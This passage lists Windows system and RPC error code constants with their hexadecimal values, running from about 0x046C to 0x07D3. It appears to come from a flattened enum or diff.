0x046C + ERROR_SET_POWER_STATE_VETOED = 0x0474 + ERROR_SET_POWER_STATE_FAILED = 0x0475 + ERROR_TOO_MANY_LINKS = 0x0476 + ERROR_OLD_WIN_VERSION = 0x047E + ERROR_APP_WRONG_OS = 0x047F + ERROR_SINGLE_INSTANCE_APP = 0x0480 + ERROR_RMODE_APP = 0x0481 + ERROR_INVALID_DLL = 0x0482 + ERROR_NO_ASSOCIATION = 0x0483 + ERROR_DDE_FAIL = 0x0484 + ERROR_DLL_NOT_FOUND = 0x0485 + ERROR_NO_MORE_USER_HANDLES = 0x0486 + ERROR_MESSAGE_SYNC_ONLY = 0x0487 + ERROR_SOURCE_ELEMENT_EMPTY = 0x0488 + ERROR_DESTINATION_ELEMENT_FULL = 0x0489 + ERROR_ILLEGAL_ELEMENT_ADDRESS = 0x048A + ERROR_MAGAZINE_NOT_PRESENT = 0x048B + ERROR_DEVICE_REINITIALIZATION_NEEDED = 0x048C + ERROR_DEVICE_REQUIRES_CLEANING = 0x048D + ERROR_DEVICE_DOOR_OPEN = 0x048E + ERROR_DEVICE_NOT_CONNECTED = 0x048F + ERROR_NOT_FOUND = 0x0490 + ERROR_NO_MATCH = 0x0491 + ERROR_SET_NOT_FOUND = 0x0492 + ERROR_POINT_NOT_FOUND = 0x0493 + ERROR_NO_TRACKING_SERVICE = 0x0494 + ERROR_NO_VOLUME_ID = 0x0495 + ERROR_UNABLE_TO_REMOVE_REPLACED = 0x0497 + ERROR_UNABLE_TO_MOVE_REPLACEMENT = 0x0498 + ERROR_UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 + ERROR_JOURNAL_DELETE_IN_PROGRESS = 0x049A + ERROR_JOURNAL_NOT_ACTIVE = 0x049B + ERROR_POTENTIAL_FILE_FOUND = 0x049C + ERROR_JOURNAL_ENTRY_DELETED = 0x049D + ERROR_SHUTDOWN_IS_SCHEDULED = 0x04A6 + ERROR_SHUTDOWN_USERS_LOGGED_ON = 0x04A7 + ERROR_BAD_DEVICE = 0x04B0 + ERROR_CONNECTION_UNAVAIL = 0x04B1 + ERROR_DEVICE_ALREADY_REMEMBERED = 0x04B2 + ERROR_NO_NET_OR_BAD_PATH = 0x04B3 + ERROR_BAD_PROVIDER = 0x04B4 + ERROR_CANNOT_OPEN_PROFILE = 0x04B5 + ERROR_BAD_PROFILE = 0x04B6 + ERROR_NOT_CONTAINER = 0x04B7 + ERROR_EXTENDED_ERROR = 0x04B8 + ERROR_INVALID_GROUPNAME = 0x04B9 + ERROR_INVALID_COMPUTERNAME = 0x04BA + ERROR_INVALID_EVENTNAME = 0x04BB + ERROR_INVALID_DOMAINNAME = 0x04BC + ERROR_INVALID_SERVICENAME = 0x04BD + ERROR_INVALID_NETNAME = 0x04BE + ERROR_INVALID_SHARENAME = 0x04BF + ERROR_INVALID_PASSWORDNAME = 0x04C0 + ERROR_INVALID_MESSAGENAME = 0x04C1 + ERROR_INVALID_MESSAGEDEST = 0x04C2 + ERROR_SESSION_CREDENTIAL_CONFLICT = 0x04C3 + ERROR_REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 + ERROR_DUP_DOMAINNAME = 0x04C5 + ERROR_NO_NETWORK = 0x04C6 + ERROR_CANCELLED = 0x04C7 + ERROR_USER_MAPPED_FILE = 0x04C8 + ERROR_CONNECTION_REFUSED = 0x04C9 + ERROR_GRACEFUL_DISCONNECT = 0x04CA + ERROR_ADDRESS_ALREADY_ASSOCIATED = 0x04CB + ERROR_ADDRESS_NOT_ASSOCIATED = 0x04CC + ERROR_CONNECTION_INVALID = 0x04CD + ERROR_CONNECTION_ACTIVE = 0x04CE + ERROR_NETWORK_UNREACHABLE = 0x04CF + ERROR_HOST_UNREACHABLE = 0x04D0 + ERROR_PROTOCOL_UNREACHABLE = 0x04D1 + ERROR_PORT_UNREACHABLE = 0x04D2 + ERROR_REQUEST_ABORTED = 0x04D3 + ERROR_CONNECTION_ABORTED = 0x04D4 + ERROR_RETRY = 0x04D5 + ERROR_CONNECTION_COUNT_LIMIT = 0x04D6 + ERROR_LOGIN_TIME_RESTRICTION = 0x04D7 + ERROR_LOGIN_WKSTA_RESTRICTION = 0x04D8 + ERROR_INCORRECT_ADDRESS = 0x04D9 + ERROR_ALREADY_REGISTERED = 0x04DA + ERROR_SERVICE_NOT_FOUND = 0x04DB + ERROR_NOT_AUTHENTICATED = 0x04DC + ERROR_NOT_LOGGED_ON = 0x04DD + ERROR_CONTINUE = 0x04DE + ERROR_ALREADY_INITIALIZED = 0x04DF + ERROR_NO_MORE_DEVICES = 0x04E0 + ERROR_NO_SUCH_SITE = 0x04E1 + ERROR_DOMAIN_CONTROLLER_EXISTS = 0x04E2 + ERROR_ONLY_IF_CONNECTED = 0x04E3 + ERROR_OVERRIDE_NOCHANGES = 0x04E4 + ERROR_BAD_USER_PROFILE = 0x04E5 + ERROR_NOT_SUPPORTED_ON_SBS = 0x04E6 + ERROR_SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 + ERROR_HOST_DOWN = 0x04E8 + ERROR_NON_ACCOUNT_SID = 0x04E9 + ERROR_NON_DOMAIN_SID = 0x04EA + ERROR_APPHELP_BLOCK = 0x04EB + ERROR_ACCESS_DISABLED_BY_POLICY = 0x04EC + ERROR_REG_NAT_CONSUMPTION = 0x04ED + ERROR_CSCSHARE_OFFLINE = 0x04EE + ERROR_PKINIT_FAILURE = 0x04EF + ERROR_SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 + ERROR_DOWNGRADE_DETECTED = 0x04F1 + ERROR_MACHINE_LOCKED = 0x04F7 + ERROR_CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 + ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA + ERROR_DRIVER_BLOCKED = 0x04FB + ERROR_INVALID_IMPORT_OF_NON_DLL = 0x04FC + ERROR_ACCESS_DISABLED_WEBBLADE = 0x04FD + ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE + ERROR_RECOVERY_FAILURE = 0x04FF + ERROR_ALREADY_FIBER = 0x0500 + ERROR_ALREADY_THREAD = 0x0501 + ERROR_STACK_BUFFER_OVERRUN = 0x0502 + ERROR_PARAMETER_QUOTA_EXCEEDED = 0x0503 + ERROR_DEBUGGER_INACTIVE = 0x0504 + ERROR_DELAY_LOAD_FAILED = 0x0505 + ERROR_VDM_DISALLOWED = 0x0506 + ERROR_UNIDENTIFIED_ERROR = 0x0507 + ERROR_INVALID_CRUNTIME_PARAMETER = 0x0508 + ERROR_BEYOND_VDL = 0x0509 + ERROR_INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A + ERROR_DRIVER_PROCESS_TERMINATED = 0x050B + ERROR_IMPLEMENTATION_LIMIT = 0x050C + ERROR_PROCESS_IS_PROTECTED = 0x050D + ERROR_SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E + ERROR_DISK_QUOTA_EXCEEDED = 0x050F + ERROR_CONTENT_BLOCKED = 0x0510 + ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 + ERROR_INVALID_LABEL = 0x0513 + ERROR_NOT_ALL_ASSIGNED = 0x0514 + ERROR_SOME_NOT_MAPPED = 0x0515 + ERROR_NO_QUOTAS_FOR_ACCOUNT = 0x0516 + ERROR_LOCAL_USER_SESSION_KEY = 0x0517 + ERROR_NULL_LM_PASSWORD = 0x0518 + ERROR_UNKNOWN_REVISION = 0x0519 + ERROR_REVISION_MISMATCH = 0x051A + ERROR_INVALID_OWNER = 0x051B + ERROR_INVALID_PRIMARY_GROUP = 0x051C + ERROR_NO_IMPERSONATION_TOKEN = 0x051D + ERROR_CANT_DISABLE_MANDATORY = 0x051E + ERROR_NO_LOGON_SERVERS = 0x051F + ERROR_NO_SUCH_LOGON_SESSION = 0x0520 + ERROR_NO_SUCH_PRIVILEGE = 0x0521 + ERROR_PRIVILEGE_NOT_HELD = 0x0522 + ERROR_INVALID_ACCOUNT_NAME = 0x0523 + ERROR_USER_EXISTS = 0x0524 + ERROR_NO_SUCH_USER = 0x0525 + ERROR_GROUP_EXISTS = 0x0526 + ERROR_NO_SUCH_GROUP = 0x0527 + ERROR_MEMBER_IN_GROUP = 0x0528 + ERROR_MEMBER_NOT_IN_GROUP = 0x0529 + ERROR_LAST_ADMIN = 0x052A + ERROR_WRONG_PASSWORD = 0x052B + ERROR_ILL_FORMED_PASSWORD = 0x052C + ERROR_PASSWORD_RESTRICTION = 0x052D + ERROR_LOGON_FAILURE = 0x052E + ERROR_ACCOUNT_RESTRICTION = 0x052F + ERROR_INVALID_LOGON_HOURS = 0x0530 + ERROR_INVALID_WORKSTATION = 0x0531 + ERROR_PASSWORD_EXPIRED = 0x0532 + ERROR_ACCOUNT_DISABLED = 0x0533 + ERROR_NONE_MAPPED = 0x0534 + ERROR_TOO_MANY_LUIDS_REQUESTED = 0x0535 + ERROR_LUIDS_EXHAUSTED = 0x0536 + ERROR_INVALID_SUB_AUTHORITY = 0x0537 + ERROR_INVALID_ACL = 0x0538 + ERROR_INVALID_SID = 0x0539 + ERROR_INVALID_SECURITY_DESCR = 0x053A + ERROR_BAD_INHERITANCE_ACL = 0x053C + ERROR_SERVER_DISABLED = 0x053D + ERROR_SERVER_NOT_DISABLED = 0x053E + ERROR_INVALID_ID_AUTHORITY = 0x053F + ERROR_ALLOTTED_SPACE_EXCEEDED = 0x0540 + ERROR_INVALID_GROUP_ATTRIBUTES = 0x0541 + ERROR_BAD_IMPERSONATION_LEVEL = 0x0542 + ERROR_CANT_OPEN_ANONYMOUS = 0x0543 + ERROR_BAD_VALIDATION_CLASS = 0x0544 + ERROR_BAD_TOKEN_TYPE = 0x0545 + ERROR_NO_SECURITY_ON_OBJECT = 0x0546 + ERROR_CANT_ACCESS_DOMAIN_INFO = 0x0547 + ERROR_INVALID_SERVER_STATE = 0x0548 + ERROR_INVALID_DOMAIN_STATE = 0x0549 + ERROR_INVALID_DOMAIN_ROLE = 0x054A + ERROR_NO_SUCH_DOMAIN = 0x054B + ERROR_DOMAIN_EXISTS = 0x054C + ERROR_DOMAIN_LIMIT_EXCEEDED = 0x054D + ERROR_INTERNAL_DB_CORRUPTION = 0x054E + ERROR_INTERNAL_ERROR = 0x054F + ERROR_GENERIC_NOT_MAPPED = 0x0550 + ERROR_BAD_DESCRIPTOR_FORMAT = 0x0551 + ERROR_NOT_LOGON_PROCESS = 0x0552 + ERROR_LOGON_SESSION_EXISTS = 0x0553 + ERROR_NO_SUCH_PACKAGE = 0x0554 + ERROR_BAD_LOGON_SESSION_STATE = 0x0555 + ERROR_LOGON_SESSION_COLLISION = 0x0556 + ERROR_INVALID_LOGON_TYPE = 0x0557 + ERROR_CANNOT_IMPERSONATE = 0x0558 + ERROR_RXACT_INVALID_STATE = 0x0559 + ERROR_RXACT_COMMIT_FAILURE = 0x055A + ERROR_SPECIAL_ACCOUNT = 0x055B + ERROR_SPECIAL_GROUP = 0x055C + ERROR_SPECIAL_USER = 0x055D + ERROR_MEMBERS_PRIMARY_GROUP = 0x055E + ERROR_TOKEN_ALREADY_IN_USE = 0x055F + ERROR_NO_SUCH_ALIAS = 0x0560 + ERROR_MEMBER_NOT_IN_ALIAS = 0x0561 + ERROR_MEMBER_IN_ALIAS = 0x0562 + ERROR_ALIAS_EXISTS = 0x0563 + ERROR_LOGON_NOT_GRANTED = 0x0564 + ERROR_TOO_MANY_SECRETS = 0x0565 + ERROR_SECRET_TOO_LONG = 0x0566 + ERROR_INTERNAL_DB_ERROR = 0x0567 + ERROR_TOO_MANY_CONTEXT_IDS = 0x0568 + ERROR_LOGON_TYPE_NOT_GRANTED = 0x0569 + ERROR_NT_CROSS_ENCRYPTION_REQUIRED = 0x056A + ERROR_NO_SUCH_MEMBER = 0x056B + ERROR_INVALID_MEMBER = 0x056C + ERROR_TOO_MANY_SIDS = 0x056D + ERROR_LM_CROSS_ENCRYPTION_REQUIRED = 0x056E + ERROR_NO_INHERITANCE = 0x056F + ERROR_FILE_CORRUPT = 0x0570 + ERROR_DISK_CORRUPT = 0x0571 + ERROR_NO_USER_SESSION_KEY = 0x0572 + ERROR_LICENSE_QUOTA_EXCEEDED = 0x0573 + ERROR_WRONG_TARGET_NAME = 0x0574 + ERROR_MUTUAL_AUTH_FAILED = 0x0575 + ERROR_TIME_SKEW = 0x0576 + ERROR_CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 + ERROR_INVALID_WINDOW_HANDLE = 0x0578 + ERROR_INVALID_MENU_HANDLE = 0x0579 + ERROR_INVALID_CURSOR_HANDLE = 0x057A + ERROR_INVALID_ACCEL_HANDLE = 0x057B + ERROR_INVALID_HOOK_HANDLE = 0x057C + ERROR_INVALID_DWP_HANDLE = 0x057D + ERROR_TLW_WITH_WSCHILD = 0x057E + ERROR_CANNOT_FIND_WND_CLASS = 0x057F + ERROR_WINDOW_OF_OTHER_THREAD = 0x0580 + ERROR_HOTKEY_ALREADY_REGISTERED = 0x0581 + ERROR_CLASS_ALREADY_EXISTS = 0x0582 + ERROR_CLASS_DOES_NOT_EXIST = 0x0583 + ERROR_CLASS_HAS_WINDOWS = 0x0584 + ERROR_INVALID_INDEX = 0x0585 + ERROR_INVALID_ICON_HANDLE = 0x0586 + ERROR_PRIVATE_DIALOG_INDEX = 0x0587 + ERROR_LISTBOX_ID_NOT_FOUND = 0x0588 + ERROR_NO_WILDCARD_CHARACTERS = 0x0589 + ERROR_CLIPBOARD_NOT_OPEN = 0x058A + ERROR_HOTKEY_NOT_REGISTERED = 0x058B + ERROR_WINDOW_NOT_DIALOG = 0x058C + ERROR_CONTROL_ID_NOT_FOUND = 0x058D + ERROR_INVALID_COMBOBOX_MESSAGE = 0x058E + ERROR_WINDOW_NOT_COMBOBOX = 0x058F + ERROR_INVALID_EDIT_HEIGHT = 0x0590 + ERROR_DC_NOT_FOUND = 0x0591 + ERROR_INVALID_HOOK_FILTER = 0x0592 + ERROR_INVALID_FILTER_PROC = 0x0593 + ERROR_HOOK_NEEDS_HMOD = 0x0594 + ERROR_GLOBAL_ONLY_HOOK = 0x0595 + ERROR_JOURNAL_HOOK_SET = 0x0596 + ERROR_HOOK_NOT_INSTALLED = 0x0597 + ERROR_INVALID_LB_MESSAGE = 0x0598 + ERROR_SETCOUNT_ON_BAD_LB = 0x0599 + ERROR_LB_WITHOUT_TABSTOPS = 0x059A + ERROR_DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B + ERROR_CHILD_WINDOW_MENU = 0x059C + ERROR_NO_SYSTEM_MENU = 0x059D + ERROR_INVALID_MSGBOX_STYLE = 0x059E + ERROR_INVALID_SPI_VALUE = 0x059F + ERROR_SCREEN_ALREADY_LOCKED = 0x05A0 + ERROR_HWNDS_HAVE_DIFF_PARENT = 0x05A1 + ERROR_NOT_CHILD_WINDOW = 0x05A2 + ERROR_INVALID_GW_COMMAND = 0x05A3 + ERROR_INVALID_THREAD_ID = 0x05A4 + ERROR_NON_MDICHILD_WINDOW = 0x05A5 + ERROR_POPUP_ALREADY_ACTIVE = 0x05A6 + ERROR_NO_SCROLLBARS = 0x05A7 + ERROR_INVALID_SCROLLBAR_RANGE = 0x05A8 + ERROR_INVALID_SHOWWIN_COMMAND = 0x05A9 + ERROR_NO_SYSTEM_RESOURCES = 0x05AA + ERROR_NONPAGED_SYSTEM_RESOURCES = 0x05AB + ERROR_PAGED_SYSTEM_RESOURCES = 0x05AC + ERROR_WORKING_SET_QUOTA = 0x05AD + ERROR_PAGEFILE_QUOTA = 0x05AE + ERROR_COMMITMENT_LIMIT = 0x05AF + ERROR_MENU_ITEM_NOT_FOUND = 0x05B0 + ERROR_INVALID_KEYBOARD_HANDLE = 0x05B1 + ERROR_HOOK_TYPE_NOT_ALLOWED = 0x05B2 + ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 + ERROR_TIMEOUT = 0x05B4 + ERROR_INVALID_MONITOR_HANDLE = 0x05B5 + ERROR_INCORRECT_SIZE = 0x05B6 + ERROR_SYMLINK_CLASS_DISABLED = 0x05B7 + ERROR_SYMLINK_NOT_SUPPORTED = 0x05B8 + ERROR_XML_PARSE_ERROR = 0x05B9 + ERROR_XMLDSIG_ERROR = 0x05BA + ERROR_RESTART_APPLICATION = 0x05BB + ERROR_WRONG_COMPARTMENT = 0x05BC + ERROR_AUTHIP_FAILURE = 0x05BD + ERROR_NO_NVRAM_RESOURCES = 0x05BE + ERROR_EVENTLOG_FILE_CORRUPT = 0x05DC + ERROR_EVENTLOG_CANT_START = 0x05DD + ERROR_LOG_FILE_FULL = 0x05DE + ERROR_EVENTLOG_FILE_CHANGED = 0x05DF + ERROR_INVALID_TASK_NAME = 0x060E + ERROR_INVALID_TASK_INDEX = 0x060F + ERROR_THREAD_ALREADY_IN_TASK = 0x0610 + ERROR_INSTALL_SERVICE_FAILURE = 0x0641 + ERROR_INSTALL_USEREXIT = 0x0642 + ERROR_INSTALL_FAILURE = 0x0643 + ERROR_INSTALL_SUSPEND = 0x0644 + ERROR_UNKNOWN_PRODUCT = 0x0645 + ERROR_UNKNOWN_FEATURE = 0x0646 + ERROR_UNKNOWN_COMPONENT = 0x0647 + ERROR_UNKNOWN_PROPERTY = 0x0648 + ERROR_INVALID_HANDLE_STATE = 0x0649 + ERROR_BAD_CONFIGURATION = 0x064A + ERROR_INDEX_ABSENT = 0x064B + ERROR_INSTALL_SOURCE_ABSENT = 0x064C + ERROR_INSTALL_PACKAGE_VERSION = 0x064D + ERROR_PRODUCT_UNINSTALLED = 0x064E + ERROR_BAD_QUERY_SYNTAX = 0x064F + ERROR_INVALID_FIELD = 0x0650 + ERROR_DEVICE_REMOVED = 0x0651 + ERROR_INSTALL_ALREADY_RUNNING = 0x0652 + ERROR_INSTALL_PACKAGE_OPEN_FAILED = 0x0653 + ERROR_INSTALL_PACKAGE_INVALID = 0x0654 + ERROR_INSTALL_UI_FAILURE = 0x0655 + ERROR_INSTALL_LOG_FAILURE = 0x0656 + ERROR_INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 + ERROR_INSTALL_TRANSFORM_FAILURE = 0x0658 + ERROR_INSTALL_PACKAGE_REJECTED = 0x0659 + ERROR_FUNCTION_NOT_CALLED = 0x065A + ERROR_FUNCTION_FAILED = 0x065B + ERROR_INVALID_TABLE = 0x065C + ERROR_DATATYPE_MISMATCH = 0x065D + ERROR_UNSUPPORTED_TYPE = 0x065E + ERROR_CREATE_FAILED = 0x065F + ERROR_INSTALL_TEMP_UNWRITABLE = 0x0660 + ERROR_INSTALL_PLATFORM_UNSUPPORTED = 0x0661 + ERROR_INSTALL_NOTUSED = 0x0662 + ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x0663 + ERROR_PATCH_PACKAGE_INVALID = 0x0664 + ERROR_PATCH_PACKAGE_UNSUPPORTED. = 0x0665 + ERROR_PRODUCT_VERSION = 0x0666 + ERROR_INVALID_COMMAND_LINE = 0x0667 + ERROR_INSTALL_REMOTE_DISALLOWED = 0x0668 + ERROR_SUCCESS_REBOOT_INITIATED = 0x0669 + ERROR_PATCH_TARGET_NOT_FOUND = 0x066A + ERROR_PATCH_PACKAGE_REJECTED = 0x066B + ERROR_INSTALL_TRANSFORM_REJECTED = 0x066C + ERROR_INSTALL_REMOTE_PROHIBITED = 0x066D + ERROR_PATCH_REMOVAL_UNSUPPORTED = 0x066E + ERROR_UNKNOWN_PATCH = 0x066F + ERROR_PATCH_NO_SEQUENCE = 0x0670 + ERROR_PATCH_REMOVAL_DISALLOWED = 0x0671 + ERROR_INVALID_PATCH_XML = 0x0672 + ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 + ERROR_INSTALL_SERVICE_SAFEBOOT = 0x0674 + ERROR_FAIL_FAST_EXCEPTION = 0x0675 + RPC_S_INVALID_STRING_BINDING = 0x06A4 + RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 + RPC_S_INVALID_BINDING = 0x06A6 + RPC_S_PROTSEQ_NOT_SUPPORTED = 0x06A7 + RPC_S_INVALID_RPC_PROTSEQ = 0x06A8 + RPC_S_INVALID_STRING_UUID = 0x06A9 + RPC_S_INVALID_ENDPOINT_FORMAT = 0x06AA + RPC_S_INVALID_NET_ADDR = 0x06AB + RPC_S_NO_ENDPOINT_FOUND = 0x06AC + RPC_S_INVALID_TIMEOUT = 0x06AD + RPC_S_OBJECT_NOT_FOUND = 0x06AE + RPC_S_ALREADY_REGISTERED = 0x06AF + RPC_S_TYPE_ALREADY_REGISTERED = 0x06B0 + RPC_S_ALREADY_LISTENING = 0x06B1 + RPC_S_NO_PROTSEQS_REGISTERED = 0x06B2 + RPC_S_NOT_LISTENING = 0x06B3 + RPC_S_UNKNOWN_MGR_TYPE = 0x06B4 + RPC_S_UNKNOWN_IF = 0x06B5 + RPC_S_NO_BINDINGS = 0x06B6 + RPC_S_NO_PROTSEQS = 0x06B7 + RPC_S_CANT_CREATE_ENDPOINT = 0x06B8 + RPC_S_OUT_OF_RESOURCES = 0x06B9 + RPC_S_SERVER_UNAVAILABLE = 0x06BA + RPC_S_SERVER_TOO_BUSY = 0x06BB + RPC_S_INVALID_NETWORK_OPTIONS = 0x06BC + RPC_S_NO_CALL_ACTIVE = 0x06BD + RPC_S_CALL_FAILED = 0x06BE + RPC_S_CALL_FAILED_DNE = 0x06BF + RPC_S_PROTOCOL_ERROR = 0x06C0 + RPC_S_PROXY_ACCESS_DENIED = 0x06C1 + RPC_S_UNSUPPORTED_TRANS_SYN = 0x06C2 + RPC_S_UNSUPPORTED_TYPE = 0x06C4 + RPC_S_INVALID_TAG = 0x06C5 + RPC_S_INVALID_BOUND = 0x06C6 + RPC_S_NO_ENTRY_NAME = 0x06C7 + RPC_S_INVALID_NAME_SYNTAX = 0x06C8 + RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x06C9 + RPC_S_UUID_NO_ADDRESS = 0x06CB + RPC_S_DUPLICATE_ENDPOINT = 0x06CC + RPC_S_UNKNOWN_AUTHN_TYPE = 0x06CD + RPC_S_MAX_CALLS_TOO_SMALL = 0x06CE + RPC_S_STRING_TOO_LONG = 0x06CF + RPC_S_PROTSEQ_NOT_FOUND = 0x06D0 + RPC_S_PROCNUM_OUT_OF_RANGE = 0x06D1 + RPC_S_BINDING_HAS_NO_AUTH = 0x06D2 + RPC_S_UNKNOWN_AUTHN_SERVICE = 0x06D3 + RPC_S_UNKNOWN_AUTHN_LEVEL = 0x06D4 + RPC_S_INVALID_AUTH_IDENTITY = 0x06D5 + RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x06D6 + EPT_S_INVALID_ENTRY = 0x06D7 + EPT_S_CANT_PERFORM_OP = 0x06D8 + EPT_S_NOT_REGISTERED = 0x06D9 + RPC_S_NOTHING_TO_EXPORT = 0x06DA + RPC_S_INCOMPLETE_NAME = 0x06DB + RPC_S_INVALID_VERS_OPTION = 0x06DC + RPC_S_NO_MORE_MEMBERS = 0x06DD + RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x06DE + RPC_S_INTERFACE_NOT_FOUND = 0x06DF + RPC_S_ENTRY_ALREADY_EXISTS = 0x06E0 + RPC_S_ENTRY_NOT_FOUND = 0x06E1 + RPC_S_NAME_SERVICE_UNAVAILABLE = 0x06E2 + RPC_S_INVALID_NAF_ID = 0x06E3 + RPC_S_CANNOT_SUPPORT = 0x06E4 + RPC_S_NO_CONTEXT_AVAILABLE = 0x06E5 + RPC_S_INTERNAL_ERROR = 0x06E6 + RPC_S_ZERO_DIVIDE = 0x06E7 + RPC_S_ADDRESS_ERROR = 0x06E8 + RPC_S_FP_DIV_ZERO = 0x06E9 + RPC_S_FP_UNDERFLOW = 0x06EA + RPC_S_FP_OVERFLOW = 0x06EB + RPC_X_NO_MORE_ENTRIES = 0x06EC + RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x06ED + RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x06EE + RPC_X_SS_IN_NULL_CONTEXT = 0x06EF + RPC_X_SS_CONTEXT_DAMAGED = 0x06F1 + RPC_X_SS_HANDLES_MISMATCH = 0x06F2 + RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x06F3 + RPC_X_NULL_REF_POINTER = 0x06F4 + RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 + RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 + RPC_X_BAD_STUB_DATA = 0x06F7 + ERROR_INVALID_USER_BUFFER = 0x06F8 + ERROR_UNRECOGNIZED_MEDIA = 0x06F9 + ERROR_NO_TRUST_LSA_SECRET = 0x06FA + ERROR_NO_TRUST_SAM_ACCOUNT = 0x06FB + ERROR_TRUSTED_DOMAIN_FAILURE = 0x06FC + ERROR_TRUSTED_RELATIONSHIP_FAILURE = 0x06FD + ERROR_TRUST_FAILURE = 0x06FE + RPC_S_CALL_IN_PROGRESS = 0x06FF + ERROR_NETLOGON_NOT_STARTED = 0x0700 + ERROR_ACCOUNT_EXPIRED = 0x0701 + ERROR_REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 + ERROR_PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 + ERROR_UNKNOWN_PORT = 0x0704 + ERROR_UNKNOWN_PRINTER_DRIVER = 0x0705 + ERROR_UNKNOWN_PRINTPROCESSOR = 0x0706 + ERROR_INVALID_SEPARATOR_FILE = 0x0707 + ERROR_INVALID_PRIORITY = 0x0708 + ERROR_INVALID_PRINTER_NAME = 0x0709 + ERROR_PRINTER_ALREADY_EXISTS = 0x070A + ERROR_INVALID_PRINTER_COMMAND = 0x070B + ERROR_INVALID_DATATYPE = 0x070C + ERROR_INVALID_ENVIRONMENT = 0x070D + RPC_S_NO_MORE_BINDINGS = 0x070E + ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F + ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 + ERROR_NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 + ERROR_DOMAIN_TRUST_INCONSISTENT = 0x0712 + ERROR_SERVER_HAS_OPEN_HANDLES = 0x0713 + ERROR_RESOURCE_DATA_NOT_FOUND = 0x0714 + ERROR_RESOURCE_TYPE_NOT_FOUND = 0x0715 + ERROR_RESOURCE_NAME_NOT_FOUND = 0x0716 + ERROR_RESOURCE_LANG_NOT_FOUND = 0x0717 + ERROR_NOT_ENOUGH_QUOTA = 0x0718 + RPC_S_NO_INTERFACES = 0x0719 + RPC_S_CALL_CANCELLED = 0x071A + RPC_S_BINDING_INCOMPLETE = 0x071B + RPC_S_COMM_FAILURE = 0x071C + RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x071D + RPC_S_NO_PRINC_NAME = 0x071E + RPC_S_NOT_RPC_ERROR = 0x071F + RPC_S_UUID_LOCAL_ONLY = 0x0720 + RPC_S_SEC_PKG_ERROR = 0x0721 + RPC_S_NOT_CANCELLED = 0x0722 + RPC_X_INVALID_ES_ACTION = 0x0723 + RPC_X_WRONG_ES_VERSION = 0x0724 + RPC_X_WRONG_STUB_VERSION = 0x0725 + RPC_X_INVALID_PIPE_OBJECT = 0x0726 + RPC_X_WRONG_PIPE_ORDER = 0x0727 + RPC_X_WRONG_PIPE_VERSION = 0x0728 + RPC_S_COOKIE_AUTH_FAILED = 0x0729 + RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A + EPT_S_CANT_CREATE = 0x076B + RPC_S_INVALID_OBJECT = 0x076C + ERROR_INVALID_TIME = 0x076D + ERROR_INVALID_FORM_NAME = 0x076E + ERROR_INVALID_FORM_SIZE = 0x076F + ERROR_ALREADY_WAITING = 0x0770 + ERROR_PRINTER_DELETED = 0x0771 + ERROR_INVALID_PRINTER_STATE = 0x0772 + ERROR_PASSWORD_MUST_CHANGE = 0x0773 + ERROR_DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 + ERROR_ACCOUNT_LOCKED_OUT = 0x0775 + OR_INVALID_OXID = 0x0776 + OR_INVALID_OID = 0x0777 + OR_INVALID_SET = 0x0778 + RPC_S_SEND_INCOMPLETE = 0x0779 + RPC_S_INVALID_ASYNC_HANDLE = 0x077A + RPC_S_INVALID_ASYNC_CALL = 0x077B + RPC_X_PIPE_CLOSED = 0x077C + RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D + RPC_X_PIPE_EMPTY = 0x077E + ERROR_NO_SITENAME = 0x077F + ERROR_CANT_ACCESS_FILE = 0x0780 + ERROR_CANT_RESOLVE_FILENAME = 0x0781 + RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 + RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 + RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 + RPC_S_PROFILE_NOT_ADDED = 0x0785 + RPC_S_PRF_ELT_NOT_ADDED = 0x0786 + RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 + RPC_S_GRP_ELT_NOT_ADDED = 0x0788 + RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 + ERROR_KM_DRIVER_BLOCKED = 0x078A + ERROR_CONTEXT_EXPIRED = 0x078B + ERROR_PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C + ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D + ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E + ERROR_AUTHENTICATION_FIREWALL_FAILED = 0x078F + ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 + ERROR_NTLM_BLOCKED = 0x0791 + ERROR_INVALID_PIXEL_FORMAT = 0x07D0 + ERROR_BAD_DRIVER = 0x07D1 + ERROR_INVALID_WINDOW_STYLE = 0x07D2 + ERROR_METAFILE_NOT_SUPPORTED = 0x07D3 + 